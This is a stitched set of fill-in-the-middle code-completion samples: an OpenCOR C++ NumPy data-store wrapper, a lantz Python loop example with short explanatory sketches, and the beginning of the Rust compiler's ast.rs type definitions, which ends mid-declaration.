5]`. The first expression is the element /// to be repeated; the second is the number of times to repeat it. ExprRepeat(P<Expr>, P<Expr>), /// No-op: used solely so we can pretty-print faithfully ExprParen(P<Expr>) } /// The explicit Self type in a "qualified path". The actual /// path, including the trait and the associated item, is stored /// separately. `position` represents the index of the associated /// item qualified with this Self type. 
/// /// <Vec<T> as a::b::Trait>::AssociatedItem /// ^~~~~ ~~~~~~~~~~~~~~^ /// ty position = 3 /// /// <Vec<T>>::AssociatedItem /// ^~~~~ ^ /// ty position = 0 #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct QSelf { pub ty: P<Ty>, pub position: usize } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum MatchSource { Normal, IfLetDesugar { contains_else_clause: bool }, WhileLetDesugar, ForLoopDesugar, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum CaptureClause { CaptureByValue, CaptureByRef, } /// A delimited sequence of token trees #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Delimited { /// The type of delimiter pub delim: token::DelimToken, /// The span covering the opening delimiter pub open_span: Span, /// The delimited sequence of token trees pub tts: Vec<TokenTree>, /// The span covering the closing delimiter pub close_span: Span, } impl Delimited { /// Returns the opening delimiter as a token. pub fn open_token(&self) -> token::Token { token::OpenDelim(self.delim) } /// Returns the closing delimiter as a token. pub fn close_token(&self) -> token::Token { token::CloseDelim(self.delim) } /// Returns the opening delimiter as a token tree. pub fn open_tt(&self) -> TokenTree { TtToken(self.open_span, self.open_token()) } /// Returns the closing delimiter as a token tree. pub fn close_tt(&self) -> TokenTree { TtToken(self.close_span, self.close_token()) } } /// A sequence of token trees #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct SequenceRepetition { /// The sequence of token trees pub tts: Vec<TokenTree>, /// The optional separator pub separator: Option<token::Token>, /// Whether the sequence can be repeated zero (*), or one or more times (+) pub op: KleeneOp, /// The number of `MatchNt`s that appear in the sequence (and subsequences) pub num_captures: usize, } /// A Kleene-style [repetition operator](http://en.wikipedia.org/wiki/Kleene_star) /// for token sequences. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum KleeneOp { ZeroOrMore, OneOrMore, } /// When the main rust parser encounters a syntax-extension invocation, it /// parses the arguments to the invocation as a token-tree. This is a very /// loose structure, such that all sorts of different AST-fragments can /// be passed to syntax extensions using a uniform type. /// /// If the syntax extension is an MBE macro, it will attempt to match its /// LHS token tree against the provided token tree, and if it finds a /// match, will transcribe the RHS token tree, splicing in any captured /// macro_parser::matched_nonterminals into the `SubstNt`s it finds. /// /// The RHS of an MBE macro is the only place `SubstNt`s are substituted. /// Nothing special happens to misnamed or misplaced `SubstNt`s. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum TokenTree { /// A single token TtToken(Span, token::Token), /// A delimited sequence of token trees TtDelimited(Span, Rc<Delimited>), // This only makes sense in MBE macros. /// A kleene-style repetition sequence with a span // FIXME(eddyb) #12938 Use DST. 
TtSequence(Span, Rc<SequenceRepetition>), } impl TokenTree { pub fn len(&self) -> usize { match *self { TtToken(_, token::DocComment(_)) => 2, TtToken(_, token::SpecialVarNt(..)) => 2, TtToken(_, token::MatchNt(..)) => 3, TtDelimited(_, ref delimed) => { delimed.tts.len() + 2 } TtSequence(_, ref seq) => { seq.tts.len() } TtToken(..) => 0 } } pub fn get_tt(&self, index: usize) -> TokenTree { match (self, index) { (&TtToken(sp, token::DocComment(_)), 0) => { TtToken(sp, token::Pound) } (&TtToken(sp, token::DocComment(name)), 1) => { TtDelimited(sp, Rc::new(Delimited { delim: token::Bracket, open_span: sp, tts: vec![TtToken(sp, token::Ident(token::str_to_ident("doc"), token::Plain)), TtToken(sp, token::Eq), TtToken(sp, token::Literal(token::StrRaw(name, 0), None))], close_span: sp, })) } (&TtDelimited(_, ref delimed), _) => { if index == 0 { return delimed.open_tt(); } if index == delimed.tts.len() + 1 { return delimed.close_tt(); } delimed.tts[index - 1].clone() } (&TtToken(sp, token::SpecialVarNt(var)), _) => { let v = [TtToken(sp, token::Dollar), TtToken(sp, token::Ident(token::str_to_ident(var.as_str()), token::Plain))]; v[index].clone() } (&TtToken(sp, token::MatchNt(name, kind, name_st, kind_st)), _) => { let v = [TtToken(sp, token::SubstNt(name, name_st)), TtToken(sp, token::Colon), TtToken(sp, token::Ident(kind, kind_st))]; v[index].clone() } (&TtSequence(_, ref seq), _) => { seq.tts[index].clone() } _ => panic!("Cannot expand a token tree") } } /// Returns the `Span` corresponding to this token tree. pub fn get_span(&self) -> Span { match *self { TtToken(span, _) => span, TtDelimited(span, _) => span, TtSequence(span, _) => span, } } /// Use this token tree as a matcher to parse given tts. pub fn parse(cx: &base::ExtCtxt, mtch: &[TokenTree], tts: &[TokenTree]) -> macro_parser::NamedParseResult { // `None` is because we're not interpolating let arg_rdr = lexer::new_tt_reader_with_doc_flag(&cx.parse_sess().span_diagnostic, None, None, tts.iter().cloned().collect(), true); macro_parser::parse(cx.parse_sess(), cx.cfg(), arg_rdr, mtch) } } pub type Mac = Spanned<Mac_>; /// Represents a macro invocation. The Path indicates which macro /// is being invoked, and the vector of token-trees contains the source /// of the macro invocation. /// /// There's only one flavor, now, so this could presumably be simplified. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Mac_ { // NB: the additional ident for a macro_rules-style macro is actually // stored in the enclosing item. Oog. MacInvocTT(Path, Vec<TokenTree>, SyntaxContext), // new macro-invocation } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum StrStyle { /// A regular string, like `"foo"` CookedStr, /// A raw string, like `r##"foo"##` /// /// The uint is the number of `#` symbols used RawStr(usize) } /// A literal pub type Lit = Spanned<Lit_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum Sign { Minus, Plus } impl Sign { pub fn new<T: IntSign>(n: T) -> Sign { n.sign() } } pub trait IntSign { fn sign(&self) -> Sign; } macro_rules! doit { ($($t:ident)*) => ($(impl IntSign for $t { #[allow(unused_comparisons)] fn sign(&self) -> Sign { if *self < 0 {Minus} else {Plus} } })*) } doit! 
{ i8 i16 i32 i64 isize u8 u16 u32 u64 usize } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum LitIntType { SignedIntLit(IntTy, Sign), UnsignedIntLit(UintTy), UnsuffixedIntLit(Sign) } impl LitIntType { pub fn suffix_len(&self) -> usize { match *self { UnsuffixedIntLit(_) => 0, SignedIntLit(s, _) => s.suffix_len(), UnsignedIntLit(u) => u.suffix_len() } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Lit_ { /// A string literal (`"foo"`) LitStr(InternedString, StrStyle), /// A byte string (`b"foo"`) LitBinary(Rc<Vec<u8>>), /// A byte char (`b'f'`) LitByte(u8), /// A character literal (`'a'`) LitChar(char), /// An integer literal (`1u8`) LitInt(u64, LitIntType), /// A float literal (`1f64` or `1E10f64`) LitFloat(InternedString, FloatTy), /// A float literal without a suffix (`1.0` or `1.0E10`) LitFloatUnsuffixed(InternedString), /// A boolean literal LitBool(bool), } // NB: If you change this, you'll probably want to change the corresponding // type structure in middle/ty.rs as well. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct MutTy { pub ty: P<Ty>, pub mutbl: Mutability, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TypeField { pub ident: Ident, pub mt: MutTy, pub span: Span, } /// Represents a method's signature in a trait declaration, /// or in an implementation. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct MethodSig { pub unsafety: Unsafety, pub constness: Constness, pub abi: Abi, pub decl: P<FnDecl>, pub generics: Generics, pub explicit_self: ExplicitSelf, } /// Represents a method declaration in a trait declaration, possibly including /// a default implementation. A trait method is either required (meaning it /// doesn't have an implementation, just a signature) or provided (meaning it /// has a default implementation). 
#[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TraitItem { pub id: NodeId, pub ident: Ident, pub attrs: Vec<Attribute>, pub node: TraitItem_, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum TraitItem_ { ConstTraitItem(P<Ty>, Option<P<Expr>>), MethodTraitItem(MethodSig, Option<P<Block>>), TypeTraitItem(TyParamBounds, Option<P<Ty>>), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct ImplItem { pub id: NodeId, pub ident: Ident, pub vis: Visibility, pub attrs: Vec<Attribute>, pub node: ImplItem_, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum ImplItem_ { ConstImplItem(P<Ty>, P<Expr>), MethodImplItem(MethodSig, P<Block>), TypeImplItem(P<Ty>), MacImplItem(Mac), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Copy)] pub enum IntTy { TyIs, TyI8, TyI16, TyI32, TyI64, } impl fmt::Debug for IntTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(self, f) } } impl fmt::Display for IntTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", ast_util::int_ty_to_string(*self, None)) } } impl IntTy { pub fn suffix_len(&self) -> usize { match *self { TyIs | TyI8 => 2, TyI16 | TyI32 | TyI64 => 3, } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Copy)] pub enum UintTy { TyUs, TyU8, TyU16, TyU32, TyU64, } impl UintTy { pub fn suffix_len(&self) -> usize { match *self { TyUs | TyU8 => 2, TyU16 | TyU32 | TyU64 => 3, } } } impl fmt::Debug for UintTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(self, f) } } impl fmt::Display for UintTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", ast_util::uint_ty_to_string(*self, None)) } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Copy)] pub enum FloatTy { TyF32, TyF64, } impl fmt::Debug for FloatTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(self, f) } } impl fmt::Display for FloatTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", ast_util::float_ty_to_string(*self)) } } impl FloatTy { pub fn suffix_len(&self) -> usize { match *self { TyF32 | TyF64 => 3, // add F128 handling here } } } // Bind a type to an associated type: `A=Foo`. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TypeBinding { pub id: NodeId, pub ident: Ident, pub ty: P<Ty>, pub span: Span, } // NB PartialEq method appears below. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub struct Ty { pub id: NodeId, pub node: Ty_, pub span: Span, } impl fmt::Debug for Ty { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "type({})", pprust::ty_to_string(self)) } } /// Not represented directly in the AST, referred to by name through a ty_path. 
#[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum PrimTy { TyInt(IntTy), TyUint(UintTy), TyFloat(FloatTy), TyStr, TyBool, TyChar } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct BareFnTy { pub unsafety: Unsafety, pub abi: Abi, pub lifetimes: Vec<LifetimeDef>, pub decl: P<FnDecl> } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] /// The different kinds of types recognized by the compiler pub enum Ty_ { TyVec(P<Ty>), /// A fixed length array (`[T; n]`) TyFixedLengthVec(P<Ty>, P<Expr>), /// A raw pointer (`*const T` or `*mut T`) TyPtr(MutTy), /// A reference (`&'a T` or `&'a mut T`) TyRptr(Option<Lifetime>, MutTy), /// A bare function (e.g. `fn(usize) -> bool`) TyBareFn(P<BareFnTy>), /// A tuple (`(A, B, C, D,...)`) TyTup(Vec<P<Ty>> ), /// A path (`module::module::...::Type`), optionally /// "qualified", e.g. `<Vec<T> as SomeTrait>::SomeType`. /// /// Type parameters are stored in the Path itself TyPath(Option<QSelf>, Path), /// Something like `A+B`. Note that `B` must always be a path. TyObjectSum(P<Ty>, TyParamBounds), /// A type like `for<'a> Foo<&'a Bar>` TyPolyTraitRef(TyParamBounds), /// No-op; kept solely so that we can pretty-print faithfully TyParen(P<Ty>), /// Unused for now TyTypeof(P<Expr>), /// TyInfer means the type should be inferred instead of it having been /// specified. This can appear anywhere in a type. TyInfer, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum AsmDialect { AsmAtt, AsmIntel } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct InlineAsm { pub asm: InternedString, pub asm_str_style: StrStyle, pub outputs: Vec<(InternedString, P<Expr>, bool)>, pub inputs: Vec<(InternedString, P<Expr>)>, pub clobbers: Vec<InternedString>, pub volatile: bool, pub alignstack: bool, pub dialect: AsmDialect, pub expn_id: ExpnId, } /// represents an argument in a function header #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Arg { pub ty: P<Ty>, pub pat: P<Pat>, pub id: NodeId, } impl Arg { pub fn new_self(span: Span, mutability: Mutability, self_ident: Ident) -> Arg { let path = Spanned{span:span,node:self_ident}; Arg { // HACK(eddyb) fake type for the self argument. 
ty: P(Ty { id: DUMMY_NODE_ID, node: TyInfer, span: DUMMY_SP, }), pat: P(Pat { id: DUMMY_NODE_ID, node: PatIdent(BindByValue(mutability), path, None), span: span }), id: DUMMY_NODE_ID } } } /// Represents the header (not the body) of a function declaration #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct FnDecl { pub inputs: Vec<Arg>, pub output: FunctionRetTy, pub variadic: bool } #[derive(Copy, Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Unsafety { Unsafe, Normal, } #[derive(Copy, Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Constness { Const, NotConst, } impl fmt::Display for Unsafety { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(match *self { Unsafety::Normal => "normal", Unsafety::Unsafe => "unsafe", }, f) } } #[derive(Copy, Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub enum ImplPolarity { /// `impl Trait for Type` Positive, /// `impl !Trait for Type` Negative, } impl fmt::Debug for ImplPolarity { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { ImplPolarity::Positive => "positive".fmt(f), ImplPolarity::Negative => "negative".fmt(f), } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum FunctionRetTy { /// Functions with return type `!` that always /// raise an error or exit (i.e. never return to the caller) NoReturn(Span), /// Return type is not specified. /// /// Functions default to `()` and /// closures default to inference. Span points to where return /// type would be inserted. DefaultReturn(Span), /// Everything else Return(P<Ty>), } impl FunctionRetTy { pub fn span(&self) -> Span { match *self { NoReturn(span) => span, DefaultReturn(span) => span, Return(ref ty) => ty.span } } } /// Represents the kind of `self` associated with a method #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum ExplicitSelf_ { /// No self SelfStatic, /// `self` SelfValue(Ident), /// `&'lt self`, `&'lt mut self` SelfRegion(Option<Lifetime>, Mutability, Ident), /// `self: TYPE` SelfExplicit(P<Ty>, Ident), } pub type ExplicitSelf = Spanned<ExplicitSelf_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Mod { /// A span from the first token past `{` to the last token before `}`. /// For `mod foo;`, the inner span ranges from the first token /// to the last token in the external file. pub inner: Span, pub items: Vec<P<Item>>, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct ForeignMod { pub abi: Abi, pub items: Vec<P<ForeignItem>>, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct VariantArg { pub ty: P<Ty>, pub id: NodeId, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum VariantKind { /// Tuple variant, e.g. `Foo(A, B)` TupleVariantKind(Vec<VariantArg>), /// Struct variant, e.g. 
`Foo {x: A, y: B}` StructVariantKind(P<StructDef>), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct EnumDef { pub variants: Vec<P<Variant>>, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Variant_ { pub name: Ident, pub attrs: Vec<Attribute>, pub kind: VariantKind, pub id: NodeId, /// Explicit discriminant, eg `Foo = 1` pub disr_expr: Option<P<Expr>>, pub vis: Visibility, } pub type Variant = Spanned<Variant_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum PathListItem_ { PathListIdent { name: Ident, id: NodeId }, PathListMod { id: NodeId } } impl PathListItem_ { pub fn id(&self) -> NodeId { match *self { PathListIdent { id, .. } | PathListMod { id } => id } } } pub type PathListItem = Spanned<PathListItem_>; pub type ViewPath = Spanned<ViewPath_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum ViewPath_ { /// `foo::bar::baz as quux` /// /// or just /// /// `foo::bar::baz` (with `as baz` implicitly on the right) ViewPathSimple(Ident, Path), /// `foo::bar::*` ViewPathGlob(Path), /// `foo::bar::{a,b,c}` ViewPathList(Path, Vec<PathListItem>) } /// Meta-data associated with an item pub type Attribute = Spanned<Attribute_>; /// Distinguishes between Attributes that decorate items and Attributes that /// are contained as statements within items. These two cases need to be /// distinguished for pretty-printing. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum AttrStyle { AttrOuter, AttrInner, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub struct AttrId(pub usize); /// Doc-comments are promoted to attributes that have is_sugared_doc = true #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Attribute_ { pub id: AttrId, pub style: AttrStyle, pub value: P<MetaItem>, pub is_sugared_doc: bool, } /// TraitRef's appear in impls. /// /// resolve maps each TraitRef's ref_id to its defining trait; that's all /// that the ref_id is for. The impl_id maps to the "self type" of this impl. /// If this impl is an ItemImpl, the impl_id is redundant (it could be the /// same as the impl's node id). 
#[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TraitRef { pub path: Path, pub ref_id: NodeId, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct PolyTraitRef { /// The `'a` in `<'a> Foo<&'a T>` pub bound_lifetimes: Vec<LifetimeDef>, /// The `Foo<&'a T>` in `<'a> Foo<&'a T>` pub trait_ref: TraitRef, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum Visibility { Public, Inherited, } impl Visibility { pub fn inherit_from(&self, parent_visibility: Visibility) -> Visibility { match self { &Inherited => parent_visibility, &Public => *self } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct StructField_ { pub kind: StructFieldKind, pub id: NodeId, pub ty: P<Ty>, pub attrs: Vec<Attribute>, } impl StructField_ { pub fn ident(&self) -> Option<Ident> { match self.kind { NamedField(ref ident, _) => Some(ident.clone()), UnnamedField(_) => None } } } pub type StructField = Spanned<StructField_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum StructFieldKind { NamedField(Ident, Visibility), /// Element of a tuple-like struct UnnamedField(Visibility), } impl StructFieldKind { pub fn is_unnamed(&self) -> bool { match *self { UnnamedField(..) => true, NamedField(..) => false, } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct StructDef { /// Fields, not including ctor pub fields: Vec<StructField>, /// ID of the constructor. This is only used for tuple- or enum-like /// structs. pub ctor_id: Option<NodeId>, } /* FIXME (#3300): Should allow items to be anonymous. Right now we just use dummy names for anon items. */ /// An item /// /// The name might be a dummy name in case of anonymous items #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Item { pub ident: Ident, pub attrs: Vec<Attribute>, pub id: NodeId, pub node: Item_, pub vis: Visibility, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Item_ { /// An `extern crate` item, with optional original crate name, /// /// e.g. `extern crate foo` or `extern crate foo_bar as foo` ItemExternCrate(Option<Name>), /// A `use` or `pub use` item ItemUse(P<ViewPath>), /// A `static` item ItemStatic(P<Ty>, Mutability, P<Expr>), /// A `const` item ItemConst(P<Ty>, P<Expr>), /// A function declaration ItemFn(P<FnDecl>, Unsafety, Constness, Abi, Generics, P<Block>), /// A module ItemMod(Mod), /// An external module ItemForeignMod(ForeignMod), /// A type alias, e.g. `type Foo = Bar<u8>` ItemTy(P<Ty>, Generics), /// An enum definition, e.g. `enum Foo<A, B> {C<A>, D<B>}` ItemEnum(EnumDef, Generics), /// A struct definition, e.g. `struct Foo<A> {x: A}` ItemStruct(P<StructDef>, Generics), /// Represents a trait declaration ItemTrait(Unsafety, Generics, TyParamBounds, Vec<P<TraitItem>>), /// A default trait implementation, e.g. `impl Trait for .. {}` ItemDefaultImpl(Unsafety, TraitRef), /// An implementation, e.g. `impl<A> Trait for Foo { .. }` ItemImpl(Unsafety, ImplPolarity, Generics, Option<TraitRef>, // (optional) trait this impl implements P<Ty>, // self Vec<P<ImplItem>>), /// A macro invocation (which includes macro definition) ItemMac(Mac), } impl Item_ { pub fn descriptive_variant(&self) -> &str { match *self { ItemExternCrate(..) => "extern crate", ItemUse(..) => "use", ItemStatic(..) => "static item", ItemConst(..) 
=> "constant item", ItemFn(..) => "function", ItemMod(..) => "module", ItemForeignMod(..) => "foreign module", ItemTy(..) => "type alias", ItemEnum(..) => "enum", ItemStruct(..) => "struct", ItemTrait(..) => "trait", ItemMac(..) | ItemImpl(..) | ItemDefaultImpl(..) => "item" } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct ForeignItem { pub ident: Ident, pub attrs: Vec<Attribute>, pub node: ForeignItem_, pub id: NodeId, pub span: Span, pub vis: Visibility, } /// An item within an `extern` block #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum ForeignItem_ { /// A foreign function ForeignItemFn(P<FnDecl>, Generics), /// A foreign static item (`static ext: u8`), with optional mutability /// (the boolean is true when mutable) ForeignItemStatic(P<Ty>, bool), } impl ForeignItem_ { pub fn descriptive_variant(&self) -> &str { match *self { ForeignItemFn(..) => "foreign function", ForeignItemStatic(..) => "foreign static item" } } } /// The data we save and restore about an inlined item or method. This is not /// part of the AST that we parse from a file, but it becomes part of the tree /// that we trans. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum InlinedItem { IIItem(P<Item>), IITraitItem(DefId /* impl id */, P<TraitItem>), IIImplItem(DefId /* impl id */, P<ImplItem>), IIForeign(P<ForeignItem>), } /// A macro definition, in this crate or imported from another. /// /// Not parsed directly, but created on macro import or `macro_rules!` expansion. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct MacroDef { pub ident: Ident, pub attrs: Vec<Attribute>, pub id: NodeId, pub span: Span, pub imported_from: Option<Ident>, pub export: bool, pub use_locally: bool, pub allow_internal_unstable: bool, pub body: Vec<TokenTree>, } #[cfg(test)] mod tests { use serialize; use super::*; // are ASTs encodable? #[test] fn check_asts_encodable() { fn assert_encodable<T: serialize::Encodable>() {} assert_encodable::<Crate>(); } }<|fim▁end|>
AngleBracketedParameters(AngleBracketedParameterData), /// The `(A,B)` and `C` in `Foo(A,B) -> C` ParenthesizedParameters(ParenthesizedParameterData), }
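Each row above pairs a prompt, delimited by the <|fim▁begin|>, <|fim▁hole|>, and <|fim▁end|> sentinels, with a completion that fills the hole. A minimal Python sketch of how such a row could be spliced back into full source text; the helper name and the absence of error handling are assumptions, while the sentinel strings are copied from the rows themselves:

FIM_BEGIN = "<|fim\u2581begin|>"  # the separator is U+2581, as in the rows above
FIM_HOLE = "<|fim\u2581hole|>"
FIM_END = "<|fim\u2581end|>"

def reassemble(prompt: str, completion: str) -> str:
    # Drop the file-name header and anything else before the begin sentinel.
    body = prompt.split(FIM_BEGIN, 1)[1]
    # The prompt holds prefix <hole> suffix <end>; the completion fills the hole.
    prefix, rest = body.split(FIM_HOLE, 1)
    suffix = rest.split(FIM_END, 1)[0]
    return prefix + completion + suffix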
<|file_name|>map_remove_entry_listener_codec.py<|end_file_name|><|fim▁begin|>from hazelcast.serialization.bits import * from hazelcast.protocol.client_message import ClientMessage from hazelcast.protocol.custom_codec import * from hazelcast.util import ImmutableLazyDataList from hazelcast.protocol.codec.map_message_type import * REQUEST_TYPE = MAP_REMOVEENTRYLISTENER RESPONSE_TYPE = 101 RETRYABLE = True def calculate_size(name, registration_id): """ Calculates the request payload size""" data_size = 0 data_size += calculate_size_str(name) data_size += calculate_size_str(registration_id) return data_size def encode_request(name, registration_id): """ Encode request into client_message""" client_message = ClientMessage(payload_size=calculate_size(name, registration_id)) client_message.set_message_type(REQUEST_TYPE) client_message.set_retryable(RETRYABLE) client_message.append_str(name) client_message.append_str(registration_id) client_message.update_frame_length() return client_message <|fim▁hole|> parameters = dict(response=None) parameters['response'] = client_message.read_bool() return parameters<|fim▁end|>
def decode_response(client_message, to_object=None): """ Decode response from client message"""
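The codec above computes its payload size before encoding anything. A hedged, simplified stand-in for that pattern (not the real hazelcast client API): each string counts as a fixed 4-byte length prefix plus its UTF-8 bytes, so the frame size is known up front.

INT_SIZE_IN_BYTES = 4  # assumed width of the length prefix

def calculate_size_str(value: str) -> int:
    # Length prefix plus UTF-8 payload, mirroring the role of calculate_size_str above.
    return INT_SIZE_IN_BYTES + len(value.encode("utf-8"))

def calculate_size(name: str, registration_id: str) -> int:
    return calculate_size_str(name) + calculate_size_str(registration_id)

print(calculate_size("my-map", "reg-1"))  # the frame can be sized before any bytes are appended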
<|file_name|>acl.go<|end_file_name|><|fim▁begin|>package main import ( "bufio" "bytes" "errors" "fmt" "io" "log" "mime" "net" "net/http" "net/url" "os" "path/filepath" "regexp" "strconv" "strings" "time" ) // Access Control Lists (ACLs) // An ACLDefinitions object contains information about how to assign ACLs to a // request. type ACLDefinitions struct { ConnectPorts map[int][]string ContentTypes map[string][]string Methods map[string][]string Referers map[string][]string StatusCodes map[int][]string URLs *URLMatcher URLTags map[string][]string UserIPAddresses map[string][]string UserIPRanges []rangeToGroup UserNames map[string][]string Times []struct { schedule WeeklySchedule acl string } UserAgents []struct { regexp *regexp.Regexp acl string } Descriptions map[string]string Actions []ACLActionRule } var errEmptyACLRule = errors.New("empty ACL rule") // AddRule adds a rule to an ACL. func (a *ACLDefinitions) AddRule(acl string, newRule []string) error { if len(newRule) == 0 { return errEmptyACLRule } keyword := newRule[0] args := newRule[1:] switch keyword { case "connect-port": if a.ConnectPorts == nil { a.ConnectPorts = make(map[int][]string) } for _, port := range args { p, err := strconv.Atoi(port) if err != nil { return err } a.ConnectPorts[p] = append(a.ConnectPorts[p], acl) } case "content-type": if a.ContentTypes == nil { a.ContentTypes = make(map[string][]string) } for _, ct := range args { a.ContentTypes[ct] = append(a.ContentTypes[ct], acl) } case "method": if a.Methods == nil { a.Methods = make(map[string][]string) } for _, m := range args { a.Methods[m] = append(a.Methods[m], acl) } case "referer", "referrer": if a.URLs == nil { a.URLs = newURLMatcher() } if a.Referers == nil { a.Referers = make(map[string][]string) } for _, u := range args { u = strings.ToLower(u) a.URLs.AddRule(rule{t: urlMatch, content: u}) a.Referers[u] = append(a.Referers[u], acl) } case "http-status": if a.StatusCodes == nil { a.StatusCodes = make(map[int][]string) } for _, s := range args { status, err := strconv.Atoi(s) if err != nil { return fmt.Errorf("invalid HTTP status code: %q", s) } a.StatusCodes[status] = append(a.StatusCodes[status], acl) } case "time": s, err := ParseWeeklySchedule(args) if err != nil { return err } a.Times = append(a.Times, struct { schedule WeeklySchedule acl string }{s, acl}) case "url": if a.URLs == nil { a.URLs = newURLMatcher() } if a.URLTags == nil { a.URLTags = make(map[string][]string) } for _, u := range args { u = strings.ToLower(u) a.URLs.AddRule(rule{t: urlMatch, content: u}) a.URLTags[u] = append(a.URLTags[u], acl) } case "user-agent": exp := strings.Join(args, " ") r, err := regexp.Compile(exp) if err != nil { return err } a.UserAgents = append(a.UserAgents, struct { regexp *regexp.Regexp acl string }{r, acl}) case "user-ip": if a.UserIPAddresses == nil { a.UserIPAddresses = make(map[string][]string) } for _, addr := range args { if ip := net.ParseIP(addr); ip != nil { s := ip.String() a.UserIPAddresses[s] = append(a.UserIPAddresses[s], acl) continue } r, err := ParseIPRange(addr) if err != nil { return fmt.Errorf("invalid IP address 